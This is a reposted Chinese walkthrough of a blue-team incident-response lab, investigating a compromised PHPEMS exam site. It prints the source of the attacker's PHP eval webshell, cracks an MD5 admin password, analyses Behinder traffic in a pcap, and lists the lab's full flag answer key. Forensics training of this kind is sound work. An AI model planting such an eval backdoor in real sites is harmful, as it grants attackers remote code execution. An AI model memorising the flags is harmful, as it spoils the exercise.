Hvv--知攻善防应急响应靶机--Linux2

news2024/11/28 18:40:41

HW–应急响应靶机–Linux2

所有靶机均来自 知攻善防实验室

靶机整理:

  • 夸克网盘:https://pan.quark.cn/s/4b6dffd0c51a#/list/share
  • 百度云盘:https://pan.baidu.com/s/1NnrS5asrS1Pw6LUbexewuA?pwd=txmy

官方WP:https://mp.weixin.qq.com/s/opj5dJK7htdawkmLbsSJiQ

蓝队应急响应工具箱:

  • 夸克网盘:https://pan.quark.cn/s/6d7856efd1d1#/list/share

  • 百度云盘:https://pan.baidu.com/s/1ZyrDPH6Ji88w9IJMoFpANA?pwd=ilzn

前景需要:

看监控的时候发现webshell告警,领导让你上机检查你可以救救安服仔吗!!

1,提交攻击者IP
2,提交攻击者修改的管理员密码(明文)
3,提交第一次Webshell的连接URL(http://xxx.xxx.xxx.xx/abcdefg?abcdefg只需要提交abcdefg?abcdefg)
3,提交Webshell连接密码
4,提交数据包的flag1
5,提交攻击者使用的后续上传的木马文件名称
6,提交攻击者隐藏的flag2
7,提交攻击者隐藏的flag3

解题关键点

网站日志

PHPMyadmin | md5加密

注册页面被挂🐎

WireShark

冰蝎Webshell流量特征

history命令

环境变量

虚拟机登录

密码中的I为大写的ℹ️

image-20240608175634390

查看虚拟机IP,我这里是10.10.10.53,NAT模式自动分配的

image-20240608175749734

由于靶机是最小化模式的,不好操作,也不好复制粘贴,我们利用MobaXterm工具ssh连接靶机进行操作,也可以利用其他ssh连接工具,如Xshell等等

image-20240608175959725

输入密码后发现成功登录靶机

image-20240608180109656

发现当前路径下有一个数据包,还有题解系统

image-20240608180354250

尝试运行题解系统,看需要获取哪些信息

image-20240608180336161

攻击者IP

这个靶机是利用宝塔来管理的,修改宝塔面板密码为root

image-20240608180219245

查看宝塔面板默认信息

image-20240608180709892

登录宝塔面板

image-20240608180839937

输入用户名密码

用户名:uysycv5w

密码:root

image-20240608180959473

成功登录宝塔面板

image-20240608181018225

在网站日志中可看到全部是 192.168.20.1 的IP地址image-20240608181309652

网站 选项卡中点击 127.0.0.1进 行站点修改,也可看到IP

image-20240608181632874

攻击者修改的管理员密码(明文)

数据库账号密码在那一行,密码点那个眼睛👀就可以显示,可以通过面板或者公共方式访问 phpMyAdmin ,都差不多

image-20240608181929477

这里我们选择面板访问,输入账号密码

用户名:kaoshi

密码:5Sx8mK5ieyLPb84m

image-20240608182238917

成功登录 phpMyAdmin ,发现 kaoshi 数据库

image-20240608182304882

在第二页的 x2_user 表中发现账号密码,密码被加密了,需要查看源码看是什么加密算法来进行逆推

不过这里一眼就可以看出是md5加密,看源码只是为了防止密码被加盐

image-20240608182429555

文件 选项卡下,发现了 register.app.php 是注册页面,双击文件即可打开在线编辑器查看文件,发现第65行,存储密码时调用了 modifyUserPassword 函数来加密

#register.app.php文件绝对路径
/www/wwwroot/127.0.0.1/app/user/controller/register.app.php

image-20240608183017784

之后在 user.cls.php 页面中发现 modifyUserPassword 函数代码块,发现利用的是md5加密算法

#user.cls.php文件绝对路径
/www/wwwroot/127.0.0.1/app/user/cls/user.cls.php

image-20240608183532263

直接将peadmin用户的密码密文放到在线解密网站去解密

在线md5解密网站:https://www.somd5.com/

密文:f6f6eb5ace977d7e114377cc7098b7e3

image-20240608183850994

得出明文密码为 Network@2020

第一次Webshell的连接URL

网站 选项卡下,双击 127.0.0.1 或者点击最右边的设置,在 域名管理 中添加一个域名,我添加的是靶机机器IP 10.10.10.53 ,之后就可以访问靶机Web页面

image-20240608184234975

访问靶机Web页面,发现是PHPEMS模拟考试系统

image-20240608184622513

拿刚刚获取的账号密码登录网站

账号:peadmin

密码:Network@2020

image-20240608184750236

然后点击 个人中心 页面的 后台管理

image-20240608184921773

成功进入网站后台管理页面

image-20240608185015035

内容页面的 标签管理选择卡中发现木马文件

image-20240608185155890

image-20240608185139128

发现木马写在了 注册协议 注册页面 ,注册协议的路由为 user-app-register

image-20240608185442672

image-20240608185412038

那提交第一次Webshell的连接URL则为

http://10.10.10.53/index.php?user-app-register

Webshell连接密码

内容选项卡页面的标签管理中发现木马文件

image-20240608185644523

#木马文件源码
<?php 
namespace t;
@eval($_POST['Network2020']);
?>

则Webshell的连接密码为 Network2020

数据包的flag1

下载 /root 目录下的 数据包1.pcapng 如果用的是 MobaXterm 软件可以直接拖拽至桌面即可完成下载,其他ssh连接软件自行网上查找下载办法,或者利用其他办法,如SCP、FTP、临时HTTP服务下载等等,这里不多赘述,请自行百度

image-20240608190030662

将数据包用 WireShark 打开,之后输入 tcp.stream eq 20 过滤出一段数据流,选择 /flag1 那一行右键,在弹出的菜单栏中选择 追踪流TCP流 ,即可弹出页面,在页面中发现 flag1

image-20240608191257392
flag1{Network@_2020_Hack}

攻击者使用的后续上传的木马文件名称

输入 tcp.stream eq 30 过滤出一段数据流,选择 /version2.php 那一行右键,在弹出的菜单栏中选择 追踪流TCP流 ,即可弹出页面,在页面中发现经典的 冰蝎Webshell特征

冰蝎Webshell流量特征参考文章:冰蝎4.0特征分析及流量检测思路 - FreeBuf网络安全行业门户

image-20240608191946017
#木马名称
version2.php

攻击者隐藏的flag2

查看 history 命令出来的命令历史记录,发现攻击者疑似依次修改过mpnotify.phpalinotify.php 两个文件

image-20240608192646304

依据历史命令得知这两个文件是在.api/目录下的,查看两个文件存放位置

image-20240608192812166

mpnotify.php 文件没有发现异常

image-20240608193116643

alinotify.php 文件中发现flag2

image-20240608193202158

flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}

攻击者隐藏的flag3

history命令查看命令记录发现攻击者创建了一个用户flag3,定义了一个全局变量$flag3,疑似修改了环境变量文件/etc/profile,env命令(显示系统的环境变量)也有嫌疑

image-20240608193353819

查看文件、变量、env命令都可查看到flag3

image-20240608193932947

flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}

成功通关

#wp通关Payload

192.168.20.1
Network@2020
index.php?user-app-register
Network2020
flag1{Network@_2020_Hack}
version2.php
flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}
flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}
flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}

成功通关

#wp通关Payload

192.168.20.1
Network@2020
index.php?user-app-register
Network2020
flag1{Network@_2020_Hack}
version2.php
flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}
flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}

image-20240608195252246

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1825271.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Perl 语言学习进阶

一、如何深入 要深入学习Perl语言的库和框架&#xff0c;可以按照以下步骤进行&#xff1a; 了解Perl的核心模块&#xff1a;Perl有许多核心模块&#xff0c;它们提供了许多常用的功能。了解这些模块的功能和用法是深入学习Perl的第一步。一些常用的核心模块包括&#xff1a;S…

Linux--MQTT(一)简介

一、简介 MQTT &#xff08; Message Queuing Telemetry Transport&#xff0c;消息队列遥测传输&#xff09;&#xff0c; 是一种基于客户端服务端架构的发布/订阅模式的消息传输协议。 与 HTTP 协议一样&#xff0c; MQTT 协议也是应用层协议&#xff0c;工作在 TCP/IP 四…

在Pycharm使用Github Copilot

文章目录 1.GitHub Copilot 是什么2.注册GitHub Copilot3.官方使用文档4.安装 GitHub Copilot插件5.在Pycharm中使用6.相关功能键7.启用或禁用 GitHub Copilot 1.GitHub Copilot 是什么 GitHub Copilot 是一款 AI 编码助手&#xff0c;可帮助你更快、更省力地编写代码&#xff…

Linux/Windows 安装 RocketMQ 详细图文教程!

Linux 安装 RocketMQ 首先&#xff0c;你需要从RocketMQ的官方网站或GitHub仓库下载最新的RocketMQ发行版下载安装&#xff0c;官网下载地址&#xff1a;https://rocketmq.apache.org/download/。 接下来配置环境变量&#xff1a; 输入vim /etc/profile命令配置环境变量输入i进…

高速公路智能管理系统:构建安全畅通的数字大动脉

随着城市化进程的加速和交通需求的增长&#xff0c;高速公路系统作为城市交通的重要组成部分&#xff0c;正承担着越来越多的交通运输任务。为了提升高速公路的安全性、便捷性和智能化管理水平&#xff0c;高速公路智能管理系统应运而生。本文将深入探讨高速公路智能管理系统的…

PromptMRG: Diagnosis-Driven Prompts for Medical Report Generation

文章汇总 存在的问题 罕见疾病在训练数据中的代表性不足&#xff0c;使其诊断性能不可靠。 解决办法 1&#xff1a;利用预训练的CLIP模型从数据库中检索相似的报告来辅助查询图像的诊断。 2&#xff1a;设计SDL模块根据不同疾病的学习状态自适应调整优化目标。 流程解读 文…

一键解锁创意无界:高效AI生成古典肖像图片,轻松打造艺术化身

在数字化时代&#xff0c;创意与艺术的结合正逐渐改变我们的生活。你是否曾梦想过拥有一幅专属于自己的古典肖像画&#xff0c;却又苦于找不到合适的画师或高昂的费用而望而却步&#xff1f;现在&#xff0c;这一切都将成为现实&#xff01; 进入首助编辑高手的AI魔法智绘图板块…

面试官:你公司是怎么做日志收集处理的?

引言&#xff1a;在现代的软件开发和运维中&#xff0c;日志管理是至关重要的一环。面试官可能会问到如何处理日志收集与分析&#xff0c;特别是在微服务架构中如何有效地管理日志数据。本文将介绍一种常见且广泛应用的解决方案&#xff1a;ELK Stack。 题目 面试官&#xff…

10W大奖等你瓜分,OpenTiny CCF开源创新大赛报名火热启动!

OpenTiny CCF开源创新大赛正式启幕&#xff01; &#x1f31f;10万奖金&#xff0c;等你来战&#xff01; &#x1f31f; &#x1f465;无论你是独行侠还是团队英雄&#x1f465; 只要你对前端技术充满热情&#xff0c; 渴望在实战中磨砺技能&#xff0c; 那么&#xff0c…

eclipse中报出Invaild project path

一、问题&#xff1a; 二、提示分析&#xff1a; 资源路径位置类型无效的项目路径&#xff1a;找到重复的路径条目 项目路径中有一个名为"/eclipse_rtt_demo"的条目被多次定义&#xff0c;这在Eclipse的构建路径设置中是不允许的。这个重复的条目既被标记为系统包含…

Postman接口测试/接口自动化实战教程

一、API 自动化测试 Postman 最基本的功能用来重放请求&#xff0c;并且配合良好的 response 格式化工具。 高级点的用法可以使用 Postman 生成各个语言的脚本&#xff0c;还可以抓包&#xff0c;认证&#xff0c;传输文件。 仅仅做到这些还不能够满足一个系统的开发&#x…

增值税发票OCR识别API在Java、Python、PHP中的使用教程

​增值税发票OCR识别是一种利用光学字符识别&#xff08;OCR&#xff09;技术&#xff0c;自动提取和识别增值税发票上的文字信息的过程。增值税发票是企业在销售商品或提供服务过程中产生的一种税务凭证&#xff0c;包含了关键的财务信息&#xff0c;如商品明细、金额、税率等…

pdf structuredClone is not defined 解决

问题 部分手机系统的浏览器 pdf v2版本会出现 structuredclone is not defined 的报错&#xff0c;这是因为浏览器过低 解决 查看structuredClone的浏览器兼容性 structuredClone api 文档 polyfill 网站下方有个 polyfill的网址入口 可以解决低版本的兼容问题 相应网址…

QT day02

思维导图 UI界面设计 设置登录界面&#xff0c;输入账号、密码&#xff0c;登录/取消 按钮 使用手动连接&#xff0c;将登录框中的取消按钮使用第二中连接方式&#xff0c;右击转到槽&#xff0c;在该槽函数中&#xff0c;调用关闭函数 将登录按钮使用qt4版本的连接到自定义…

计算机组成原理学习 Part 1

计算机系统 组成 计算机系统 { 硬件 计算机的实体&#xff0c;如主机、外设等 软件 由具有各类特殊功能的信息&#xff08;程序&#xff09;组成 计算机系统 \begin{cases} 硬件 &\text 计算机的实体&#xff0c;如主机、外设等\\ 软件 &\text 由具有各类特殊功能的信…

牛客链表刷题(二)

目录 题目一&#xff1a;合并两个有序链表 代码&#xff1a; 题目二&#xff1a;合并k个有序链表 代码&#xff1a; 题目三&#xff1a;判断链表中是否有环 代码&#xff1a; 题目四&#xff1a;链表中环的入口结点 代码&#xff1a; 题目一&#xff1a;合并两个有序链表 代…

B端系统:面向用户or面向客户?有啥区别?当二者起冲突呢?

在B端系统中用户和客户大部分情况下是分离的&#xff0c;不像C端&#xff0c;用户即客户。那么用户和客户到底怎么区分&#xff0c;做B端设计到底听谁的呢&#xff1f;大美B端工场为大家详细解读下。 一、B端产品的用户和客户 在B端产品中&#xff0c;用户和客户是两个不同的…

推荐一款mac截图利器

一、介绍 Longshot 是 macOS 上一款功能丰富的截图工具&#xff0c;它提供了多种截图方式和便捷的标注功能。主要包含以下功能特点&#xff1a; 多种截图方式&#xff1a;Longshot 支持区域截图、全屏截图、窗口截图以及滚动截图。 标注工具&#xff1a;提供了丰富的标注工具…

FlinkCDC 3.1.0 支持 Flink 1.18.0 版本选择

问题&#xff1a;FlinkCDC 3.1.0 pipeline 与 Flink 1.17.0 可能是因为出现版本不支持的问题&#xff08;已实测&#xff09; 持续报错&#xff1a; -- client log Exception in thread "main" java.lang.BootstrapMethodError: java.lang.NoSuchMethodError: org.a…

开源医疗大模型Llama3-Aloe-8B-Alpha,性能超越 MedAlpaca 和 PMC-LLaMA

前言 近年来&#xff0c;大型语言模型 (LLM) 在医疗领域展现出巨大潜力&#xff0c;能够帮助医生和研究人员更快地获取信息、分析数据&#xff0c;并提高医疗服务效率。然而&#xff0c;目前市场上大多数医疗 LLM 都是闭源模型&#xff0c;限制了其在学术研究和应用领域的推广…